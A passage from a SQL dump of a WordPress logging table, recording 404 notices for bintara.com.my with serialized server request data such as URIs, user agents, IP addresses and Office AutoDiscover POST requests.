2019-09-29 13:41:19','2019-09-29 13:41:16',35125984,36934112,'http://bintara.com.my/wordpress/',1,0,'45.93.20.4'),(27303,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE/Nutch-1.13\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.190.45.152\";s:11:\"REMOTE_PORT\";s:4:\"9092\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZCb0HupQ8972QULTgzJoAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569758160.3772\";s:12:\"REQUEST_TIME\";s:10:\"1569758160\";}}','notice','2019-09-29 11:56:03','2019-09-29 11:56:00',35539472,37336632,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'46.190.45.152'),(27304,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:4:\"/wp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:25:\"http://bintara.com.my/wp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/wp/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZC0dY@6RYMKETn@Euqu2gAAAZE\";s:12:\"REDIRECT_URL\";s:4:\"/wp/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"45550\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:25:\"http://bintara.com.my/wp/\";s:10:\"SCRIPT_URL\";s:4:\"/wp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZC0dY@6RYMKETn@Euqu2gAAAZE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569764469.3647\";s:12:\"REQUEST_TIME\";s:10:\"1569764469\";}}','notice','2019-09-29 13:41:14','2019-09-29 13:41:09',35525528,37330040,'http://bintara.com.my/wp/',1,0,'45.93.20.4'),(27478,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"27B302EB-3504-4DB3-972A-501AE696645E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZan@81AW5Yhg56lSglobgAAAAU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"60994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZan@81AW5Yhg56lSglobgAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570154492.1149\";s:12:\"REQUEST_TIME\";s:10:\"1570154492\";}}','notice','2019-10-04 02:01:34','2019-10-04 02:01:32',35387824,37192960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27477,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"11DE99C9-246D-4832-A118-5160E0C0C96F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZankc1AW5Yhg56lSgloOQAAAA8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"50512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZankc1AW5Yhg56lSgloOQAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570154385.8098\";s:12:\"REQUEST_TIME\";s:10:\"1570154385\";}}','notice','2019-10-04 01:59:47','2019-10-04 01:59:46',35386056,37173120,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27476,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7EB4DC9E-6E66-40FC-9A3D-9BCADA000D43\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZamnARUccy7Wh4UNKd83QAAAFI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"55418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZamnARUccy7Wh4UNKd83QAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570154140.2255\";s:12:\"REQUEST_TIME\";s:10:\"1570154140\";}}','notice','2019-10-04 01:55:42','2019-10-04 01:55:40',35387824,37192960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27475,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.133.55\";s:11:\"REMOTE_PORT\";s:5:\"52826\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZakD81AW5Yhg56lSglmCwAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570153487.1611\";s:12:\"REQUEST_TIME\";s:10:\"1570153487\";}}','notice','2019-10-04 01:44:50','2019-10-04 01:44:47',35013720,36818304,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.55'),(27474,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"860497E6-AD02-4CA2-BBDB-AC959958909B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZagQ1wBui0WThkqL3MutwAAAMo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"58248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZagQ1wBui0WThkqL3MutwAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570152515.4506\";s:12:\"REQUEST_TIME\";s:10:\"1570152515\";}}','notice','2019-10-04 01:28:37','2019-10-04 01:28:35',35389168,37193504,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27473,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"13D5B6B5-D7B5-45E7-8A5C-0071539D2F6C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZafK81AW5Yhg56lSgljDwAAAAU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.161.3\";s:11:\"REMOTE_PORT\";s:5:\"28057\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZafK81AW5Yhg56lSgljDwAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570152236.0718\";s:12:\"REQUEST_TIME\";s:10:\"1570152236\";}}','notice','2019-10-04 01:23:59','2019-10-04 01:23:56',35780928,37578768,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.161.3'),(27472,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; 